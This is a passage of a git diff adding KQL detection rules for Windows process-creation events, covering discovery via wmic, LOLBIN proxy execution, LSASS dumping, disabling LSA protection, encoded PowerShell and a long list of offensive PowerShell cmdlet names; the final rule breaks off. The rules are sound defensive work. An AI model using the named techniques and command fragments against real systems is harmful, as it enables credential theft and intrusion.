+// Date: 2021-12-12
+// Level: low
+// Description: Detects the execution of "wmic" with the "group" flag.
+// Adversaries may attempt to find local system groups and permission settings.
+// The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.
+// Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1069.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " group" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/logged_on_user_password_change_via_ksetup_exe.kql b/KQL/rules/windows/process_creation/logged_on_user_password_change_via_ksetup_exe.kql
new file mode 100644
index 00000000..5349e8a2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/logged_on_user_password_change_via_ksetup_exe.kql
@@ -0,0 +1,10 @@
+// Title: Logged-On User Password Change Via Ksetup.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-06
+// Level: medium
+// Description: Detects password change for the logged-on user's via "ksetup.exe"
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /ChangePassword " and (FolderPath endswith "\\ksetup.exe" or ProcessVersionInfoOriginalFileName =~ "ksetup.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/lol_binary_copied_from_system_directory.kql b/KQL/rules/windows/process_creation/lol_binary_copied_from_system_directory.kql
new file mode 100644
index 00000000..cb596131
--- /dev/null
+++ b/KQL/rules/windows/process_creation/lol_binary_copied_from_system_directory.kql
@@ -0,0 +1,10 @@
+// Title: LOL-Binary Copied From System Directory
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-29
+// Level: high
+// Description: Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and ((ProcessCommandLine contains "\\bitsadmin.exe" or ProcessCommandLine contains "\\calc.exe" or ProcessCommandLine contains "\\certutil.exe" or ProcessCommandLine contains "\\cmdl32.exe" or ProcessCommandLine contains "\\cscript.exe" or ProcessCommandLine contains "\\mshta.exe" or ProcessCommandLine contains "\\rundll32.exe" or ProcessCommandLine contains "\\wscript.exe" or ProcessCommandLine contains "\\ie4uinit.exe") and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/lolbas_data_exfiltration_by_datasvcutil_exe.kql b/KQL/rules/windows/process_creation/lolbas_data_exfiltration_by_datasvcutil_exe.kql
new file mode 100644
index 00000000..aea9618f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/lolbas_data_exfiltration_by_datasvcutil_exe.kql
@@ -0,0 +1,14 @@
+// Title: LOLBAS Data Exfiltration by DataSvcUtil.exe
+// Author: Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger
+// Date: 2021-09-30
+// Level: medium
+// Description: Detects when a user performs data exfiltration by using DataSvcUtil.exe
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1567
+// False Positives:
+//   - DataSvcUtil.exe being used may be performed by a system administrator.
+//   - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+//   - DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/in:" or ProcessCommandLine contains "/out:" or ProcessCommandLine contains "/uri:") and (FolderPath endswith "\\DataSvcUtil.exe" or ProcessVersionInfoOriginalFileName =~ "DataSvcUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/lolbin_runexehelper_use_as_proxy.kql b/KQL/rules/windows/process_creation/lolbin_runexehelper_use_as_proxy.kql
new file mode 100644
index 00000000..18e0d02a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/lolbin_runexehelper_use_as_proxy.kql
@@ -0,0 +1,10 @@
+// Title: Lolbin Runexehelper Use As Proxy
+// Author: frack113
+// Date: 2022-12-29
+// Level: medium
+// Description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\runexehelper.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/lolbin_unregmp2_exe_use_as_proxy.kql b/KQL/rules/windows/process_creation/lolbin_unregmp2_exe_use_as_proxy.kql
new file mode 100644
index 00000000..4ebe6505
--- /dev/null
+++ b/KQL/rules/windows/process_creation/lolbin_unregmp2_exe_use_as_proxy.kql
@@ -0,0 +1,10 @@
+// Title: Lolbin Unregmp2.exe Use As Proxy
+// Author: frack113
+// Date: 2022-12-29
+// Level: medium
+// Description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -HideWMP" or ProcessCommandLine contains " /HideWMP" or ProcessCommandLine contains " –HideWMP" or ProcessCommandLine contains " —HideWMP" or ProcessCommandLine contains " ―HideWMP") and (FolderPath endswith "\\unregmp2.exe" or ProcessVersionInfoOriginalFileName =~ "unregmp2.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/lsa_ppl_protection_disabled_via_reg_exe.kql b/KQL/rules/windows/process_creation/lsa_ppl_protection_disabled_via_reg_exe.kql
new file mode 100644
index 00000000..601077fd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/lsa_ppl_protection_disabled_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: LSA PPL Protection Disabled Via Reg.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-22
+// Level: high
+// Description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.010
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Control\\Lsa" and (ProcessCommandLine contains " add " and ProcessCommandLine contains " /d 0" and ProcessCommandLine contains " /v RunAsPPL ")) and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/lsass_dump_keyword_in_commandline.kql b/KQL/rules/windows/process_creation/lsass_dump_keyword_in_commandline.kql
new file mode 100644
index 00000000..43d11d20
--- /dev/null
+++ b/KQL/rules/windows/process_creation/lsass_dump_keyword_in_commandline.kql
@@ -0,0 +1,12 @@
+// Title: LSASS Dump Keyword In CommandLine
+// Author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-24
+// Level: high
+// Description: Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "lsass.dmp" or ProcessCommandLine contains "lsass.zip" or ProcessCommandLine contains "lsass.rar" or ProcessCommandLine contains "Andrew.dmp" or ProcessCommandLine contains "Coredump.dmp" or ProcessCommandLine contains "NotLSASS.zip" or ProcessCommandLine contains "lsass_2" or ProcessCommandLine contains "lsassdump" or ProcessCommandLine contains "lsassdmp") or (ProcessCommandLine contains "lsass" and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains "SQLDmpr" and ProcessCommandLine contains ".mdmp") or (ProcessCommandLine contains "nanodump" and ProcessCommandLine contains ".dmp")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/lsass_process_reconnaissance_via_findstr_exe.kql b/KQL/rules/windows/process_creation/lsass_process_reconnaissance_via_findstr_exe.kql
new file mode 100644
index 00000000..3ff548be
--- /dev/null
+++ b/KQL/rules/windows/process_creation/lsass_process_reconnaissance_via_findstr_exe.kql
@@ -0,0 +1,10 @@
+// Title: LSASS Process Reconnaissance Via Findstr.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-12
+// Level: high
+// Description: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "lsass" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains " -i \"lsass" or ProcessCommandLine contains " /i \"lsass" or ProcessCommandLine contains " –i \"lsass" or ProcessCommandLine contains " —i \"lsass" or ProcessCommandLine contains " ―i \"lsass" or ProcessCommandLine contains " -i lsass.exe" or ProcessCommandLine contains " /i lsass.exe" or ProcessCommandLine contains " –i lsass.exe" or ProcessCommandLine contains " —i lsass.exe" or ProcessCommandLine contains " ―i lsass.exe" or ProcessCommandLine contains "findstr \"lsass" or ProcessCommandLine contains "findstr lsass" or ProcessCommandLine contains "findstr.exe \"lsass" or ProcessCommandLine contains "findstr.exe lsass")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/malicious_base64_encoded_powershell_keywords_in_command_lines.kql b/KQL/rules/windows/process_creation/malicious_base64_encoded_powershell_keywords_in_command_lines.kql
new file mode 100644
index 00000000..faad903c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/malicious_base64_encoded_powershell_keywords_in_command_lines.kql
@@ -0,0 +1,10 @@
+// Title: Malicious Base64 Encoded PowerShell Keywords in Command Lines
+// Author: John Lambert (rule)
+// Date: 2019-01-16
+// Level: high
+// Description: Detects base64 encoded strings used in hidden malicious PowerShell command lines
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA" or ProcessCommandLine contains "aXRzYWRtaW4gL3RyYW5zZmVy" or ProcessCommandLine contains "IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA" or ProcessCommandLine contains "JpdHNhZG1pbiAvdHJhbnNmZX" or ProcessCommandLine contains "YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg" or ProcessCommandLine contains "Yml0c2FkbWluIC90cmFuc2Zlc" or ProcessCommandLine contains "AGMAaAB1AG4AawBfAHMAaQB6AGUA" or ProcessCommandLine contains "JABjAGgAdQBuAGsAXwBzAGkAegBlA" or ProcessCommandLine contains "JGNodW5rX3Npem" or ProcessCommandLine contains "QAYwBoAHUAbgBrAF8AcwBpAHoAZQ" or ProcessCommandLine contains "RjaHVua19zaXpl" or ProcessCommandLine contains "Y2h1bmtfc2l6Z" or ProcessCommandLine contains "AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A" or ProcessCommandLine contains "kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg" or ProcessCommandLine contains "lPLkNvbXByZXNzaW9u" or ProcessCommandLine contains "SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA" or ProcessCommandLine contains "SU8uQ29tcHJlc3Npb2" or ProcessCommandLine contains "Ty5Db21wcmVzc2lvb" or ProcessCommandLine contains "AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ" or ProcessCommandLine contains "kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA" or ProcessCommandLine contains "lPLk1lbW9yeVN0cmVhb" or ProcessCommandLine contains "SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A" or ProcessCommandLine contains "SU8uTWVtb3J5U3RyZWFt" or ProcessCommandLine contains "Ty5NZW1vcnlTdHJlYW" or ProcessCommandLine contains "4ARwBlAHQAQwBoAHUAbgBrA" or ProcessCommandLine contains "5HZXRDaHVua" or ProcessCommandLine contains "AEcAZQB0AEMAaAB1AG4Aaw" or ProcessCommandLine contains "LgBHAGUAdABDAGgAdQBuAGsA" or ProcessCommandLine contains "LkdldENodW5r" or ProcessCommandLine contains "R2V0Q2h1bm" or ProcessCommandLine contains "AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A" or ProcessCommandLine contains "QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA" or ProcessCommandLine contains "RIUkVBRF9JTkZPNj" or ProcessCommandLine contains "SFJFQURfSU5GTzY0" or ProcessCommandLine contains "VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA" or ProcessCommandLine contains "VEhSRUFEX0lORk82N" or ProcessCommandLine contains "AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA" or ProcessCommandLine contains "cmVhdGVSZW1vdGVUaHJlYW" or ProcessCommandLine contains "MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA" or ProcessCommandLine contains "NyZWF0ZVJlbW90ZVRocmVhZ" or ProcessCommandLine contains "Q3JlYXRlUmVtb3RlVGhyZWFk" or ProcessCommandLine contains "QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA" or ProcessCommandLine contains "0AZQBtAG0AbwB2AGUA" or ProcessCommandLine contains "1lbW1vdm" or ProcessCommandLine contains "AGUAbQBtAG8AdgBlA" or ProcessCommandLine contains "bQBlAG0AbQBvAHYAZQ" or ProcessCommandLine contains "bWVtbW92Z" or ProcessCommandLine contains "ZW1tb3Zl") and ProcessCommandLine contains " hidden " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql b/KQL/rules/windows/process_creation/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql
new file mode 100644
index 00000000..163b5085
--- /dev/null
+++ b/KQL/rules/windows/process_creation/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql
@@ -0,0 +1,14 @@
+// Title: Malicious PE Execution by Microsoft Visual Studio Debugger
+// Author: Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community
+// Date: 2020-10-14
+// Level: medium
+// Description: There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger.
+// This option may be used adversaries to execute malicious code by signed verified binary.
+// The debugger is installed alongside with Microsoft Visual Studio package.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1218, attack.defense-evasion
+// False Positives:
+//   - The process spawned by vsjitdebugger.exe is uncommon.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\vsjitdebugger.exe" and (not(((FolderPath contains "\\vsimmersiveactivatehelper" and FolderPath contains ".exe") or FolderPath endswith "\\devenv.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/malicious_powershell_commandlets_processcreation.kql b/KQL/rules/windows/process_creation/malicious_powershell_commandlets_processcreation.kql
new file mode 100644
index 00000000..93509013
--- /dev/null
+++ b/KQL/rules/windows/process_creation/malicious_powershell_commandlets_processcreation.kql
@@ -0,0 +1,10 @@
+// Title: Malicious PowerShell Commandlets - ProcessCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-02
+// Level: high
+// Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.discovery, attack.t1482, attack.t1087, attack.t1087.001, attack.t1087.002, attack.t1069.001, attack.t1069.002, attack.t1069, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Add-Exfiltration" or ProcessCommandLine contains "Add-Persistence" or ProcessCommandLine contains "Add-RegBackdoor" or ProcessCommandLine contains "Add-RemoteRegBackdoor" or ProcessCommandLine contains "Add-ScrnSaveBackdoor" or ProcessCommandLine contains "Check-VM" or ProcessCommandLine contains "ConvertTo-Rc4ByteStream" or ProcessCommandLine contains "Decrypt-Hash" or ProcessCommandLine contains "Disable-ADIDNSNode" or ProcessCommandLine contains "Disable-MachineAccount" or ProcessCommandLine contains "Do-Exfiltration" or ProcessCommandLine contains "Enable-ADIDNSNode" or ProcessCommandLine contains "Enable-MachineAccount" or ProcessCommandLine contains "Enabled-DuplicateToken" or ProcessCommandLine contains "Exploit-Jboss" or ProcessCommandLine contains "Export-ADR" or ProcessCommandLine contains "Export-ADRCSV" or ProcessCommandLine contains "Export-ADRExcel" or ProcessCommandLine contains "Export-ADRHTML" or ProcessCommandLine contains "Export-ADRJSON" or ProcessCommandLine contains "Export-ADRXML" or ProcessCommandLine contains "Find-Fruit" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-TrustedDocuments" or ProcessCommandLine contains "Get-ADIDNS" or ProcessCommandLine contains "Get-ApplicationHost" or ProcessCommandLine contains "Get-ChromeDump" or ProcessCommandLine contains "Get-ClipboardContents" or ProcessCommandLine contains "Get-FoxDump" or ProcessCommandLine contains "Get-GPPPassword" or ProcessCommandLine contains "Get-IndexedItem" or ProcessCommandLine contains "Get-KerberosAESKey" or ProcessCommandLine contains "Get-Keystrokes" or ProcessCommandLine contains "Get-LSASecret" or ProcessCommandLine contains "Get-MachineAccountAttribute" or ProcessCommandLine contains "Get-MachineAccountCreator" or ProcessCommandLine contains "Get-PassHashes" or ProcessCommandLine contains "Get-RegAlwaysInstallElevated" or ProcessCommandLine contains "Get-RegAutoLogon" or ProcessCommandLine contains "Get-RemoteBootKey" or ProcessCommandLine contains "Get-RemoteCachedCredential" or ProcessCommandLine contains "Get-RemoteLocalAccountHash" or ProcessCommandLine contains "Get-RemoteLSAKey" or ProcessCommandLine contains "Get-RemoteMachineAccountHash" or ProcessCommandLine contains "Get-RemoteNLKMKey" or ProcessCommandLine contains "Get-RickAstley" or ProcessCommandLine contains "Get-Screenshot" or ProcessCommandLine contains "Get-SecurityPackages" or ProcessCommandLine contains "Get-ServiceFilePermission" or ProcessCommandLine contains "Get-ServicePermission" or ProcessCommandLine contains "Get-ServiceUnquoted" or ProcessCommandLine contains "Get-SiteListPassword" or ProcessCommandLine contains "Get-System" or ProcessCommandLine contains "Get-TimedScreenshot" or ProcessCommandLine contains "Get-UnattendedInstallFile" or ProcessCommandLine contains "Get-Unconstrained" or ProcessCommandLine contains "Get-USBKeystrokes" or ProcessCommandLine contains "Get-VaultCredential" or ProcessCommandLine contains "Get-VulnAutoRun" or ProcessCommandLine contains "Get-VulnSchTask" or ProcessCommandLine contains "Grant-ADIDNSPermission" or ProcessCommandLine contains "Gupt-Backdoor" or ProcessCommandLine contains "HTTP-Login" or ProcessCommandLine contains "Install-ServiceBinary" or ProcessCommandLine contains "Install-SSP" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-ADRecon" or ProcessCommandLine contains "Invoke-ADSBackdoor" or ProcessCommandLine contains "Invoke-AgentSmith" or ProcessCommandLine contains "Invoke-AllChecks" or ProcessCommandLine contains "Invoke-ARPScan" or ProcessCommandLine contains "Invoke-AzureHound" or ProcessCommandLine contains "Invoke-BackdoorLNK" or ProcessCommandLine contains "Invoke-BadPotato" or ProcessCommandLine contains "Invoke-BetterSafetyKatz" or ProcessCommandLine contains "Invoke-BypassUAC" or ProcessCommandLine contains "Invoke-Carbuncle" or ProcessCommandLine contains "Invoke-Certify" or ProcessCommandLine contains "Invoke-ConPtyShell" or ProcessCommandLine contains "Invoke-CredentialInjection" or ProcessCommandLine contains "Invoke-DAFT" or ProcessCommandLine contains "Invoke-DCSync" or ProcessCommandLine contains "Invoke-DinvokeKatz" or ProcessCommandLine contains "Invoke-DllInjection" or ProcessCommandLine contains "Invoke-DNSUpdate" or ProcessCommandLine contains "Invoke-DNSExfiltrator" or ProcessCommandLine contains "Invoke-DomainPasswordSpray" or ProcessCommandLine contains "Invoke-DowngradeAccount" or ProcessCommandLine contains "Invoke-EgressCheck" or ProcessCommandLine contains "Invoke-Eyewitness" or ProcessCommandLine contains "Invoke-FakeLogonScreen" or ProcessCommandLine contains "Invoke-Farmer" or ProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or ProcessCommandLine contains "Invoke-Gopher" or ProcessCommandLine contains "Invoke-Grouper" or ProcessCommandLine contains "Invoke-HandleKatz" or ProcessCommandLine contains "Invoke-ImpersonatedProcess" or ProcessCommandLine contains "Invoke-ImpersonateSystem" or ProcessCommandLine contains "Invoke-InteractiveSystemPowerShell" or ProcessCommandLine contains "Invoke-Internalmonologue" or ProcessCommandLine contains "Invoke-Inveigh" or ProcessCommandLine contains "Invoke-InveighRelay" or ProcessCommandLine contains "Invoke-KrbRelay" or ProcessCommandLine contains "Invoke-LdapSignCheck" or ProcessCommandLine contains "Invoke-Lockless" or ProcessCommandLine contains "Invoke-MalSCCM" or ProcessCommandLine contains "Invoke-Mimikatz" or ProcessCommandLine contains "Invoke-Mimikittenz" or ProcessCommandLine contains "Invoke-MITM6" or ProcessCommandLine contains "Invoke-NanoDump" or ProcessCommandLine contains "Invoke-NetRipper" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "Invoke-NinjaCopy" or ProcessCommandLine contains "Invoke-OfficeScrape" or ProcessCommandLine contains "Invoke-OxidResolver" or ProcessCommandLine contains "Invoke-P0wnedshell" or ProcessCommandLine contains "Invoke-Paranoia" or ProcessCommandLine contains "Invoke-PortScan" or ProcessCommandLine contains "Invoke-PoshRatHttp" or ProcessCommandLine contains "Invoke-PostExfil" or ProcessCommandLine contains "Invoke-PowerDump" or ProcessCommandLine contains "Invoke-PowerDPAPI" or ProcessCommandLine contains "Invoke-PowerShellTCP" or ProcessCommandLine contains "Invoke-PowerShellWMI" or ProcessCommandLine contains "Invoke-PPLDump" or ProcessCommandLine contains "Invoke-PsExec" or ProcessCommandLine contains "Invoke-PSInject" or ProcessCommandLine contains "Invoke-PsUaCme" or ProcessCommandLine contains "Invoke-ReflectivePEInjection" or ProcessCommandLine contains "Invoke-ReverseDNSLookup" or ProcessCommandLine contains "Invoke-Rubeus" or ProcessCommandLine contains "Invoke-RunAs" or ProcessCommandLine contains "Invoke-SafetyKatz" or ProcessCommandLine contains "Invoke-SauronEye" or ProcessCommandLine contains "Invoke-SCShell" or ProcessCommandLine contains "Invoke-Seatbelt" or ProcessCommandLine contains "Invoke-ServiceAbuse" or ProcessCommandLine contains "Invoke-ShadowSpray" or ProcessCommandLine contains "Invoke-Sharp" or ProcessCommandLine contains "Invoke-Shellcode" or ProcessCommandLine contains "Invoke-SMBScanner" or ProcessCommandLine contains "Invoke-Snaffler" or ProcessCommandLine contains "Invoke-Spoolsample" or ProcessCommandLine contains "Invoke-SpraySinglePassword" or ProcessCommandLine contains "Invoke-SSHCommand" or ProcessCommandLine contains "Invoke-StandIn" or ProcessCommandLine contains "Invoke-StickyNotesExtract" or ProcessCommandLine contains "Invoke-SystemCommand" or ProcessCommandLine contains "Invoke-Tasksbackdoor" or ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains "Invoke-Thunderfox" or ProcessCommandLine contains "Invoke-ThunderStruck" or ProcessCommandLine contains "Invoke-TokenManipulation" or ProcessCommandLine contains "Invoke-Tokenvator" or ProcessCommandLine contains "Invoke-TotalExec" or ProcessCommandLine contains "Invoke-UrbanBishop" or ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-VoiceTroll" or ProcessCommandLine contains "Invoke-Whisker" or ProcessCommandLine contains "Invoke-WinEnum" or ProcessCommandLine contains "Invoke-winPEAS" or ProcessCommandLine contains "Invoke-WireTap" or ProcessCommandLine contains "Invoke-WmiCommand" or ProcessCommandLine contains "Invoke-WMIExec" or ProcessCommandLine contains "Invoke-WScriptBypassUAC" or ProcessCommandLine contains "Invoke-Zerologon" or ProcessCommandLine contains "MailRaider" or ProcessCommandLine contains "New-ADIDNSNode" or ProcessCommandLine contains "New-DNSRecordArray" or ProcessCommandLine contains "New-HoneyHash" or ProcessCommandLine contains "New-InMemoryModule" or ProcessCommandLine contains "New-MachineAccount" or ProcessCommandLine contains "New-SOASerialNumberArray" or ProcessCommandLine contains "Out-Minidump" or ProcessCommandLine contains "Port-Scan" or ProcessCommandLine contains "PowerBreach" or ProcessCommandLine contains "powercat " or ProcessCommandLine contains "PowerUp" or ProcessCommandLine contains "PowerView" or ProcessCommandLine contains "Remove-ADIDNSNode" or ProcessCommandLine contains "Remove-MachineAccount" or ProcessCommandLine contains "Remove-Update" or ProcessCommandLine contains "Rename-ADIDNSNode" or ProcessCommandLine contains "Revoke-ADIDNSPermission" or ProcessCommandLine contains "Set-ADIDNSNode" or ProcessCommandLine contains "Set-MacAttribute" or ProcessCommandLine contains "Set-MachineAccountAttribute" or ProcessCommandLine contains "Set-Wallpaper" or ProcessCommandLine contains "Show-TargetScreen" or ProcessCommandLine contains "Start-CaptureServer" or ProcessCommandLine contains "Start-Dnscat2" or ProcessCommandLine contains "Start-WebcamRecorder" or ProcessCommandLine contains "Veeam-Get-Creds" or ProcessCommandLine contains "VolumeShadowCopyTools"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/malicious_windows_script_components_file_execution_by_taef_detection.kql b/KQL/rules/windows/process_creation/malicious_windows_script_components_file_execution_by_taef_detection.kql
new file mode 100644
index 00000000..d8c763af
--- /dev/null
+++ b/KQL/rules/windows/process_creation/malicious_windows_script_components_file_execution_by_taef_detection.kql
@@ -0,0 +1,13 @@
+// Title: Malicious Windows Script Components File Execution by TAEF Detection
+// Author: Agro (@agro_sev) oscd.community
+// Date: 2020-10-13
+// Level: low
+// Description: Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces
+// Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - It's not an uncommon to use te.exe directly to execute legal TAEF tests
+
+DeviceProcessEvents
+| where FolderPath endswith "\\te.exe" or InitiatingProcessFolderPath endswith "\\te.exe" or ProcessVersionInfoOriginalFileName =~ "\\te.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/mavinject_inject_dll_into_running_process.kql b/KQL/rules/windows/process_creation/mavinject_inject_dll_into_running_process.kql
new file mode 100644
index 00000000..a8f212f6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/mavinject_inject_dll_into_running_process.kql
@@ -0,0 +1,10 @@
+// Title: Mavinject Inject DLL Into Running Process
+// Author: frack113, Florian Roth
+// Date: 2021-07-12
+// Level: high
+// Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055.001, attack.t1218.013
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /INJECTRUNNING " and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\AppVClient.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/microsoft_iis_connection_strings_decryption.kql b/KQL/rules/windows/process_creation/microsoft_iis_connection_strings_decryption.kql
new file mode 100644
index 00000000..8c413bbd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/microsoft_iis_connection_strings_decryption.kql
@@ -0,0 +1,10 @@
+// Title: Microsoft IIS Connection Strings Decryption
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-28
+// Level: high
+// Description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "connectionStrings" and ProcessCommandLine contains " -pdf") and (FolderPath endswith "\\aspnet_regiis.exe" or ProcessVersionInfoOriginalFileName =~ "aspnet_regiis.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/microsoft_iis_service_account_password_dumped.kql b/KQL/rules/windows/process_creation/microsoft_iis_service_account_password_dumped.kql
new file mode 100644
index 00000000..3d4a95cf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/microsoft_iis_service_account_password_dumped.kql
@@ -0,0 +1,10 @@
+// Title: Microsoft IIS Service Account Password Dumped
+// Author: Tim Rauch, Janantha Marasinghe, Elastic (original idea)
+// Date: 2022-11-08
+// Level: high
+// Description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+
+DeviceProcessEvents
